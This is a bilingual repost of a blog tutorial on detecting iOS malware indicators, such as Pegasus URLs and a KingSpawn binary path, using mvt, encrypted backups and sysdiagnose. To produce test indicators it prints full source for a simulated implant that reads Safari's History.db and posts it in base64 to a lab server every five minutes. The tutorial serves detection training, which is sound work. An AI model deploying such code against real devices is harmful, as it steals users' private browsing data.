Mobile Malware Analysis Part 5 – Analyzing An Infected Device

逆向病毒分析 5个月前 admin

69 0 0

In the first part of iOS Malware Detection as a part of our Mobile Malware Analysis Series, we covered how to gather forensics artifacts, what to use to do analysis and what are some interesting files on the iOS. In this part, we will simulate a couple of IOCs and to see how to search for them.
作为移动恶意软件分析系列的一部分，在 iOS 恶意软件检测的第一部分中，我们介绍了如何收集取证工件、使用什么进行分析以及 iOS 上有哪些有趣的文件。在这一部分中，我们将模拟几个 IOC，并了解如何搜索它们。

The first part will focus on opening a couple of links and to search for them using different methods (filesystem dump, backup and sysdiagnose), while the second part will be focused on the creating a binary which was previously used by malware.
第一部分将侧重于打开几个链接并使用不同的方法（文件系统转储、备份和系统诊断）搜索它们，而第二部分将侧重于创建以前被恶意软件使用的二进制文件。

We will use mvt with filesystem dump as well as with the backup. Additionally, we will see how to search for the same information using sysdiagnose dump.
我们将与文件系统转储以及备份一起使用 mvt 。此外，我们将了解如何使用 sysdiagnose dump 搜索相同的信息。

Visiting Malicious URLs 访问恶意网址

To simulate, we will visit a couple of links which are indicators for Pegasus and they can be seen inside of Pegasus stix2 file which mvt contains.
为了模拟，我们将访问几个链接，这些链接是 Pegasus 的指标，它们可以在 mvt 包含的 Pegasus stix2 文件中看到。

The URLs we will use:
我们将使用的 URL：

Mvt

Before going with any of these two methods, we first need to download IOCs for mvt. We can do that using mvt-ios download-iocs command.
在使用这两种方法中的任何一种之前，我们首先需要下载 mvt 的 IOC。我们可以使用 mvt-ios download-iocs 命令来做到这一点。

We can see that we have downloaded IOCs for malware such as Operation Triangulation, KingSpawn and Pegasus
我们可以看到，我们已经下载了用于 Operation Triangulation、KingSpawn 和 Pegasus 等恶意软件的 IOC.

Filesystem Dump 文件系统转储

The first method we will use is filesystem dump. We can use ssh to dump the filesystem followed by the mvt-ios check-fs to actually analyse the dump.
我们将使用的第一种方法是文件系统转储。我们可以用来 ssh 转储文件系统，然后 mvt-ios check-fs 实际分析转储。

After the filesystem dump has completed, we have created dump, directory and extracted the filesystem dump to that directory.
文件系统转储完成后，我们创建 dump 了，目录并将文件系统转储解压缩到该目录。

All we have to do now is run mvt-ios check-fs against this directory along with the directory where mvt will store its output (-o flag).
我们现在要做的就是针对此目录以及 mvt 将存储其输出的目录（ -o 标志）运行 mvt-ios check-fs 。

Once the mvt has started, we can see that it has loaded all previously downloaded IOCs. A bit down the output, we can see that it has matched URL http://youintelligence.com domain against Pegasus’ domain name indicator youintelligence.com from the records inside of Favicons.db database.
一旦 mvt 启动，我们可以看到它已经加载了所有以前下载的 IOC。在输出稍下方，我们可以看到它已将 URL http://youintelligence.com 域与 Pegasus 的域名指示器匹配，youintelligence.com Favicons.db 从数据库内的记录中。

Following that, mvt has extracted the records from History.db file is the history file of Safari.
之后，mvt从 History.db Safari的历史文件中提取了记录。

We can see that mvt has indeed found all these malicious URLs which are known IOC for Pegasus malware. Once mvt finishes, we can go to the directory we have passed with output flag and examine its content. One of the most useful files in there is timeline_detected.csv which contains the chronological timeline of all matched IOCs.
我们可以看到，确实找到了所有这些恶意 URL， mvt 这些 URL 是 Pegasus 恶意软件的已知 IOC。一旦 mvt 完成，我们就可以转到我们传递的带有输出标志的目录并检查其内容。其中最有用的文件之一是 timeline_detected.csv 包含所有匹配 IOC 的时间顺序。

ITunes Backup ITunes 备份

In the situation where the device is not jailbroken, we can use backups to analyse them. We can use Finder to backup the device or we can use idevicebackup2 from libimobiledevice to do the backup.
在设备未越狱的情况下，我们可以使用备份来分析它们。我们可以使用Finder来备份设备，也可以使用 idevicebackup2 From libimobiledevice 进行备份。

One thing we should keep in mind is that the encrypted backups provide more coverage so we should aim to do just that.
我们应该记住的一件事是，加密备份提供了更多的覆盖范围，因此我们应该致力于做到这一点。

To create the encrypted backup we use idevicebackup2 encryption on PASSWORD to turn on encryption.
要创建加密备份，我们用于 idevicebackup2 encryption on PASSWORD 打开加密。

Once the encryption is turned on, we can start the backup with idevicebackup2 backup --full PATH_TO_OUTPUT_DIRECTORY. The output directory needs to be created prior to starting the actual backup.
打开加密后，我们可以使用 idevicebackup2 backup --full PATH_TO_OUTPUT_DIRECTORY .在开始实际备份之前，需要创建输出目录。

Before we can actually analyse the backup, we first need to decrypt it which we can use with mvt-ios decrypt-backup command which accepts the password that was used to encrypt the backup along with the destination where the decrypted backup will be stored.
在我们实际分析备份之前，我们首先需要解密它，我们可以将其与 mvt-ios decrypt-backup 命令一起使用，该命令接受用于加密备份的密码以及将存储解密备份的目的地。

Now that we have decrypted backup, we can actually analyse it by using mvt-ios check-backup
现在我们已经解密了备份，我们实际上可以使用以下方法 mvt-ios check-backup 对其进行分析.

After the usual info from the mvt, we can see that it has found the same IOCs as it was the case with the filesystem dump. We also have the same timeline_detected.csv file created inside the result directory.

There are of course more files in there which was the case with the filesystem dump and if we are analysing potentially malicious activity, it is worth checking all of them.

Sysdiagnose

The third method that we can use is using sysdiagnose. Sysdiagnose is a native way to gather logs which from the device.

We can trigger the sysdiagnose logs to get collected using the keys combination (holding together Volume Up + Volume Down + Power button). It takes a couple of minutes for the sysdiagnose logs to get generated.
我们可以使用组合键（同时按住音量调高 + 音量调低 + 电源按钮）来触发 sysdiagnose 日志。生成 sysdiagnose 日志需要几分钟时间。

Once the sysdiagnose has finished, we can use ipsw idev crash pull to pull the sysdiagnose logs. We first need to obtain the name of the sysdiagnose log, we can do that using ipsw idev crash ls command.
一旦 sysdiagnose 完成，我们就可以用来 ipsw idev crash pull 拉取 sysdiagnose 日志。我们首先需要获取 sysdiagnose 日志的名称，我们可以使用 ipsw idev crash ls 命令来做到这一点。

Once we have obtained the name, we just pass it to ipsw idev crash pull
一旦我们获得了名称，我们只需将其 ipsw idev crash pull 传递给.

Once the logs are downloaded, we can extract the archive and start analysing it.
下载日志后，我们可以提取存档并开始分析它。

We will grep over all files present inside the sysdiagnose logs, but we won’t be able to find any of the URL IOCs. The reason for that is that the sysdiagnose does not contain the user data and browser history and URLs it has visited belong to user data not the system.
我们将遍历 sysdiagnose 日志中存在的所有文件，但我们将无法找到任何 URL IOC。原因是 sysdiagnose 不包含用户数据和浏览器历史记录，它访问过的 URL 属于用户数据，而不是系统。

As we can see, not a single match was found for these URL indicators. sysdiagnose is a great tool but its main con is that it does not contain user data.
正如我们所看到的，没有找到这些 URL 指示器的单个匹配项。SysDiagnose 是一个很棒的工具，但它的主要缺点是它不包含用户数据。

This marks the end of the analysis of malicious URLs, we will move to the simulating malicious binary and see how to hunt for that and to show that the sysdiagnose can prove useful there.

Running Malicious Binary

In the previous section, we have seen how to search for URL IOCs and that filesystem dump and iTunes backup both contain them. sysdiagnose didn’t have them because it does not contain user data
在上一节中，我们已经了解了如何搜索 URL IOC，并且文件系统转储和 iTunes 备份都包含它们。sysdiagnose 没有它们，因为它不包含用户数据

Now we will create a binary with the same name that was used in one of the known malware samples.
现在，我们将创建一个二进制文件，其名称与其中一个已知恶意软件示例中使用的名称相同。

The binary will be simple and it will have the following functionalities:
二进制文件将很简单，它将具有以下功能：

we will name it subridged and place it to /private/var/db/com.apple.xpc.roleaccountd.staging/ as it was used in KingSpawn
我们将它命名为 subridged，并将其放置在 /private/var/db/com.apple.xpc.roleaccountd.staging/ KingSpawn 中使用的位置
it will be run as root user; otherwise delete itself
它将以用户身份 root 运行;否则删除自身
edit /etc/hosts so that it resolves to our Mac address instead of utilising DNS
编辑 /etc/hosts，使其解析为我们的 Mac 地址，而不是使用 DNS
periodically dump the History.db file and send it to 8ksecmail.io(points to our own Mac IP address)
定期转储 History.db 文件并将其发送到 8ksecmail.io （指向我们自己的 Mac IP 地址）

The full code is: 完整代码为：

#include <unistd.h>
#import <Foundation/Foundation.h>

#include "base64.h"

#define TARGET  "/private/var/mobile/Library/Safari/History.db"

int clean(char *);

int main(int argc, char **argv)
{
    // check if we are root and exit if we are not
    if (getuid() != 0) {
        return clean(argv[0]);
    }

    FILE * f;

    for (;;) {
        f = fopen(TARGET, "rb");
        if (f == NULL)
        {
            return clean(argv[0]);
        }

        size_t sz;
        fseek(f, 0, SEEK_END);
        sz = ftell(f);
        fseek(f, 0, SEEK_SET);

        char * content = (char*)malloc(sz+1);
        fread(content, sz, 1, f);
        fclose(f);

        char * dest = (char*)malloc(sz*2);

        Base64encode(dest, content, sz);

        NSMutableURLRequest *urlRequest = [[NSMutableURLRequest alloc] initWithURL:[NSURL URLWithString:@"http://192.168.100.62/history"]];
        NSString *postData = [NSString stringWithFormat:@"history=%s",dest];

        [urlRequest setHTTPMethod:@"POST"];

        NSData *data1 = [postData dataUsingEncoding:NSUTF8StringEncoding];

        [urlRequest setHTTPBody:data1];

        NSURLSession *session = [NSURLSession sharedSession];
        NSURLSessionDataTask *dataTask = [session dataTaskWithRequest:urlRequest completionHandler:^(NSData *data, NSURLResponse *response, NSError *error) {
            }
        ];
        [dataTask resume];

        free(content);
        free(dest);

        sleep(300);
    }

    return 0;
}

int clean(char *p)
{
    remove(p);
    return 1;
}

To simulate the web server, we will use the following HTTP response and use netcat to server it:
为了模拟 Web 服务器，我们将使用以下 HTTP 响应并使用 netcat 来服务器：

HTTP/1.1 200 OK
Server: 8ksec
Content-Type: text/html; charset=UTF-8

<html>
    <head>
        <title>8ksecmal.io</title>
    <style id="wpr-lazyload-bg"></style><style id="wpr-lazyload-bg-exclusion"></style>
<noscript>
<style id="wpr-lazyload-bg-nostyle">:root{--wpr-bg-85ca1c33-e6c6-4683-bae6-bd3e6ca5bea1: url('https://8ksec.io/wp-includes/js/mediaelement/mejs-controls.svg');}:root{--wpr-bg-b45fcc58-9843-4bfe-9b2d-072bf474a9af: url('https://8ksec.io/wp-includes/js/mediaelement/mejs-controls.svg');}:root{--wpr-bg-b9724bcc-390c-46f4-8024-41246c3a50d9: url('https://8ksec.io/wp-includes/js/mediaelement/mejs-controls.svg');}:root{--wpr-bg-49cb5fe7-52a2-4c24-9fc6-f3ce970e1a09: url('../../../../../../../../../../../../../../plugins/elementskit-lite/widgets/init/assets/img/arrow.png');}:root{--wpr-bg-e8b2d879-b3fd-4091-9edd-1d7558247ffc: url('../../../../../../../../../../../../../../plugins/elementskit-lite/widgets/init/assets/img/sort_asc.png');}:root{--wpr-bg-cedd5577-44a6-4ade-a03d-e67658885f43: url('../../../../../../../../../../../../../../plugins/elementskit-lite/widgets/init/assets/img/sort_desc.png');}:root{--wpr-bg-2b70211c-0bd5-4d6c-8aa5-3bdfdfe55b25: url('../../../../../../../../../../../../../../plugins/elementskit-lite/widgets/init/assets/img/sort_asc_disabled.png');}:root{--wpr-bg-07b9cc29-0c57-4a62-bca5-8ab473bcf64d: url('../../../../../../../../../../../plugins/jetpack/modules/shortcodes/img/slideshow-controls.png');}:root{--wpr-bg-6b56334f-a77e-497e-811d-99e668e23aa9: url('../../../../../../../../../../../plugins/jetpack/modules/shortcodes/img/slideshow-controls-2x.png');}:root{--wpr-bg-19437be3-0608-4768-a24b-ada1ef92b638: url('../../../../../../../../../../../plugins/jetpack/modules/shortcodes/images/slide-nav.png');}:root{--wpr-bg-dfdf6659-b25a-4584-ac4d-60a597a1a555: url('../../../../../../../../../../../plugins/jetpack/modules/shortcodes/images/expand.png');}:root{--wpr-bg-e7c72262-8639-4427-8b82-d4f61129d1c8: url('../../../../../../../../../../../plugins/jetpack/modules/shortcodes/images/collapse.png');}:root{--wpr-bg-f31a9822-ac24-46da-ab4e-60d198b1e21d: url('https://secure.gravatar.com/images/grav-share-sprite.png');}:root{--wpr-bg-dea560fa-b21a-408c-a26c-727bf552164d: url('https://secure.gravatar.com/images/grav-share-sprite-2x.png');}:root{--wpr-bg-1c31766d-807e-4aed-a0f3-6703e4acabac: url('https://8ksec.io/wp-content/plugins/wp-rocket/assets/img/youtube.png');}:root{--wpr-bg-ac78e962-fe3a-4e57-a22d-5fb91c2b76ea: url('https://8ksec.io/wp-content/plugins/wp-rocket/assets/img/youtube.png');}</style>
</noscript>
<script type="application/javascript">const rocket_pairs = [{"selector":".mejs-overlay-button","style":":root{--wpr-bg-85ca1c33-e6c6-4683-bae6-bd3e6ca5bea1: url('https:\/\/8ksec.io\/wp-includes\/js\/mediaelement\/mejs-controls.svg');}","hash":"85ca1c33-e6c6-4683-bae6-bd3e6ca5bea1"},{"selector":".mejs-overlay-loading-bg-img","style":":root{--wpr-bg-b45fcc58-9843-4bfe-9b2d-072bf474a9af: url('https:\/\/8ksec.io\/wp-includes\/js\/mediaelement\/mejs-controls.svg');}","hash":"b45fcc58-9843-4bfe-9b2d-072bf474a9af"},{"selector":".mejs-button>button","style":":root{--wpr-bg-b9724bcc-390c-46f4-8024-41246c3a50d9: url('https:\/\/8ksec.io\/wp-includes\/js\/mediaelement\/mejs-controls.svg');}","hash":"b9724bcc-390c-46f4-8024-41246c3a50d9"},{"selector":"table.dataTable thead .sorting","style":":root{--wpr-bg-49cb5fe7-52a2-4c24-9fc6-f3ce970e1a09: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/elementskit-lite\/widgets\/init\/assets\/img\/arrow.png');}","hash":"49cb5fe7-52a2-4c24-9fc6-f3ce970e1a09"},{"selector":"table.dataTable thead .sorting_asc","style":":root{--wpr-bg-e8b2d879-b3fd-4091-9edd-1d7558247ffc: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/elementskit-lite\/widgets\/init\/assets\/img\/sort_asc.png');}","hash":"e8b2d879-b3fd-4091-9edd-1d7558247ffc"},{"selector":"table.dataTable thead .sorting_desc","style":":root{--wpr-bg-cedd5577-44a6-4ade-a03d-e67658885f43: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/elementskit-lite\/widgets\/init\/assets\/img\/sort_desc.png');}","hash":"cedd5577-44a6-4ade-a03d-e67658885f43"},{"selector":"table.dataTable thead .sorting_asc_disabled","style":":root{--wpr-bg-2b70211c-0bd5-4d6c-8aa5-3bdfdfe55b25: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/elementskit-lite\/widgets\/init\/assets\/img\/sort_asc_disabled.png');}","hash":"2b70211c-0bd5-4d6c-8aa5-3bdfdfe55b25"},{"selector":"body div div.jetpack-slideshow-controls a","style":":root{--wpr-bg-07b9cc29-0c57-4a62-bca5-8ab473bcf64d: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/jetpack\/modules\/shortcodes\/img\/slideshow-controls.png');}","hash":"07b9cc29-0c57-4a62-bca5-8ab473bcf64d"},{"selector":"body div div.jetpack-slideshow-controls a","style":":root{--wpr-bg-6b56334f-a77e-497e-811d-99e668e23aa9: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/jetpack\/modules\/shortcodes\/img\/slideshow-controls-2x.png');}","hash":"6b56334f-a77e-497e-811d-99e668e23aa9"},{"selector":".presentation .nav-arrow-left,.presentation .nav-arrow-right","style":":root{--wpr-bg-19437be3-0608-4768-a24b-ada1ef92b638: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/jetpack\/modules\/shortcodes\/images\/slide-nav.png');}","hash":"19437be3-0608-4768-a24b-ada1ef92b638"},{"selector":".presentation .nav-fullscreen-button","style":":root{--wpr-bg-dfdf6659-b25a-4584-ac4d-60a597a1a555: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/jetpack\/modules\/shortcodes\/images\/expand.png');}","hash":"dfdf6659-b25a-4584-ac4d-60a597a1a555"},{"selector":".presentation-wrapper-fullscreen .nav-fullscreen-button","style":":root{--wpr-bg-e7c72262-8639-4427-8b82-d4f61129d1c8: url('..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/plugins\/jetpack\/modules\/shortcodes\/images\/collapse.png');}","hash":"e7c72262-8639-4427-8b82-d4f61129d1c8"},{"selector":".widget-grofile .grofile-accounts-logo","style":":root{--wpr-bg-f31a9822-ac24-46da-ab4e-60d198b1e21d: url('https:\/\/secure.gravatar.com\/images\/grav-share-sprite.png');}","hash":"f31a9822-ac24-46da-ab4e-60d198b1e21d"},{"selector":".widget-grofile .grofile-accounts-logo","style":":root{--wpr-bg-dea560fa-b21a-408c-a26c-727bf552164d: url('https:\/\/secure.gravatar.com\/images\/grav-share-sprite-2x.png');}","hash":"dea560fa-b21a-408c-a26c-727bf552164d"},{"selector":".rll-youtube-player .play","style":":root{--wpr-bg-1c31766d-807e-4aed-a0f3-6703e4acabac: url('https:\/\/8ksec.io\/wp-content\/plugins\/wp-rocket\/assets\/img\/youtube.png');}","hash":"1c31766d-807e-4aed-a0f3-6703e4acabac"},{"selector":".rll-youtube-player .play","style":":root{--wpr-bg-ac78e962-fe3a-4e57-a22d-5fb91c2b76ea: url('https:\/\/8ksec.io\/wp-content\/plugins\/wp-rocket\/assets\/img\/youtube.png');}","hash":"ac78e962-fe3a-4e57-a22d-5fb91c2b76ea"}];</script></head>
<body
    <center>
        <p>Welcome to 8ksecmal.io</p>
    </center>
<script>class RocketElementorAnimation{constructor(){this.deviceMode=document.createElement("span"),this.deviceMode.id="elementor-device-mode-wpr",this.deviceMode.setAttribute("class","elementor-screen-only"),document.body.appendChild(this.deviceMode)}_detectAnimations(){let t=getComputedStyle(this.deviceMode,":after").content.replace(/"/g,"");this.animationSettingKeys=this._listAnimationSettingsKeys(t),document.querySelectorAll(".elementor-invisible[data-settings]").forEach(t=>{const e=t.getBoundingClientRect();if(e.bottom>=0&&e.top<=window.innerHeight)try{this._animateElement(t)}catch(t){}})}_animateElement(t){const e=JSON.parse(t.dataset.settings),i=e._animation_delay||e.animation_delay||0,n=e[this.animationSettingKeys.find(t=>e[t])];if("none"===n)return void t.classList.remove("elementor-invisible");t.classList.remove(n),this.currentAnimation&&t.classList.remove(this.currentAnimation),this.currentAnimation=n;let s=setTimeout(()=>{t.classList.remove("elementor-invisible"),t.classList.add("animated",n),this._removeAnimationSettings(t,e)},i);window.addEventListener("rocket-startLoading",function(){clearTimeout(s)})}_listAnimationSettingsKeys(t="mobile"){const e=[""];switch(t){case"mobile":e.unshift("_mobile");case"tablet":e.unshift("_tablet");case"desktop":e.unshift("_desktop")}const i=[];return["animation","_animation"].forEach(t=>{e.forEach(e=>{i.push(t+e)})}),i}_removeAnimationSettings(t,e){this._listAnimationSettingsKeys().forEach(t=>delete e[t]),t.dataset.settings=JSON.stringify(e)}static run(){const t=new RocketElementorAnimation;requestAnimationFrame(t._detectAnimations.bind(t))}}document.addEventListener("DOMContentLoaded",RocketElementorAnimation.run);</script></body>
</html>

After the binary has successfully contacted us, we will see the base64 representation of History.db file being sent to us.
二进制文件成功与我们联系后，我们将看到 History.db 文件的 base64 表示形式正在发送给我们。

Mvt

Filesystem Dump & ITunes Backup
文件系统转储和 ITunes 备份

Since we have already covered how to do filesystem dump and iTunes backup, we will jump straight to the analysis.
由于我们已经介绍了如何进行文件系统转储和iTunes备份，因此我们将直接进行分析。

command: mvt-ios check-fs ./dump/ -o /tmp/mvt-fs 命令： mvt-ios check-fs ./dump/ -o /tmp/mvt-fs

Once the Filesystem has been loaded, we can see that the malicious binary we have created and placed on the location has been identified as one of IOC from KingSpawn which is excellent.
加载文件系统后，我们可以看到我们创建并放置在该位置的恶意二进制文件已被识别为 KingSpawn 的 IOC 之一，这非常出色。

Taking a look at the Cache.db file for the subridged we can see the IP address to where the HTTP request was made as well as the response that it got.
查看子层的 Cache.db 文件，我们可以看到发出 HTTP 请求的 IP 地址以及它得到的响应。

We could now proceed further by grabbing the binary and doing further analysis on it.
现在，我们可以通过抓取二进制文件并对其进行进一步分析来进一步进行。

We will now do the same against the backup file.
我们现在将对备份文件执行相同的操作。

command: mvt-ios check-backup /tmp/mvt-decrypted-backup -o /tmp/mvt-for-backup 命令： mvt-ios check-backup /tmp/mvt-decrypted-backup -o /tmp/mvt-for-backup

What we can see is that the backup did not find the match for our “malicious” binary as those checks are part of Filesystem module of mvt so we did not have luck with this one.
我们可以看到的是，备份没有找到我们的“恶意”二进制文件的匹配项，因为这些检查是 mvt 文件系统模块的一部分，所以我们没有运气。

Even though the subridged is present inside of osaanalytics.addaily.plist file, it was not enough to trigger the detection.
即使 subridged 存在于 osaanalytics.addaily.plist 文件中，也不足以触发检测。

NOTE: as mvt-ios was stripping the “/“ from the start of filename, we have to hack it a bit because otherwise it would never match our IOC (/private/var/db/com.apple.xpc.roleaccountd.staging/). This probably was not the right solution, but in our case it was.
注意：由于 mvt-ios 从文件名的开头剥离了“/”，我们必须对其进行一些修改，否则它永远不会与我们的 IOC 匹配（ /private/var/db/com.apple.xpc.roleaccountd.staging/ ）。这可能不是正确的解决方案，但在我们的例子中确实如此。

Sysdiagnose 系统诊断

After we have obtained sysdiagnose logs, we can try grepping for the word subridged. As can be seen on the image below, we have a lot of matches.
在获得 sysdiagnose 日志后，我们可以尝试 grepping 这个词 subridged 。如下图所示，我们有很多比赛。

Because subridged is the name of the legitimate iPhone process, we can take a look at ps.txt file which contains the list of running processes in order to get PID of our subridged process which in our case is 7749
因为 subridged 是合法iPhone进程的名称，我们可以查看 ps.txt 包含正在运行的进程列表的文件，以获取进程 subridged 的PID，在我们的例子中是 7749.

We can now do the further analysis, such as taking a look at all the threads or its task info (taskinfo.txt) file.
我们现在可以进行进一步的分析，例如查看所有线程或其任务信息（ taskinfo.txt ）文件。

Conclusion 结论

This marks the end of our second blog post on the iOS Malware Detection part as a part of our Mobile Malware Series. We have seen how we can utilise mvt (both filesystem dump on the jailbroken device and iTunes backup on nonjailbroken device) as well as sysdiagnose how can be used on both of them. As you can see, each of these three have their pros and cons and what to use depends on your possibilities, for example sometimes you cannot jailbreak the device and you need to resort to the iTunes backup and sysdiagnose which can sometimes miss a couple of useful artefacts.
这标志着我们关于 iOS 恶意软件检测部分的第二篇博文的结束，该部分作为我们的移动恶意软件系列的一部分。我们已经看到了如何利用 mvt（越狱设备上的文件系统转储和非越狱设备上的 iTunes 备份）以及如何在两者上使用 sysdiagnose。如您所见，这三者中的每一个都有其优点和缺点，使用什么取决于您的可能性，例如，有时您无法越狱设备，您需要求助于iTunes备份和系统诊断，这有时会错过一些有用的人工制品。

原文始发于8ksecresearch：Mobile Malware Analysis Part 5 – Analyzing An Infected Device

版权声明：admin 发表于 2023年12月1日下午6:08。
转载请注明：Mobile Malware Analysis Part 5 – Analyzing An Infected Device | CTF导航

XHtmlTreeTest中的木马dll分析

admin

584

每周移动恶意程序传播渠道安全监测报告（2022年1月24日—2022年1月30日）

admin

603

因势象形：警惕银狐组织发起新一轮钓鱼攻击

admin

355

通过 Rank-1 相似性矩阵分解建模反病毒引擎共识演化

admin

221

赛博空间的魔眼：PROMETHIUM伪造NotePad++安装包的攻击活动分析

admin

806

【病毒分析】locked勒索病毒分析

admin

暂无评论

您必须登录才能参与评论！

立即登录

暂无评论...

Mobile Malware Analysis Part 5 – Analyzing An Infected Device

Visiting Malicious URLs 访问恶意网址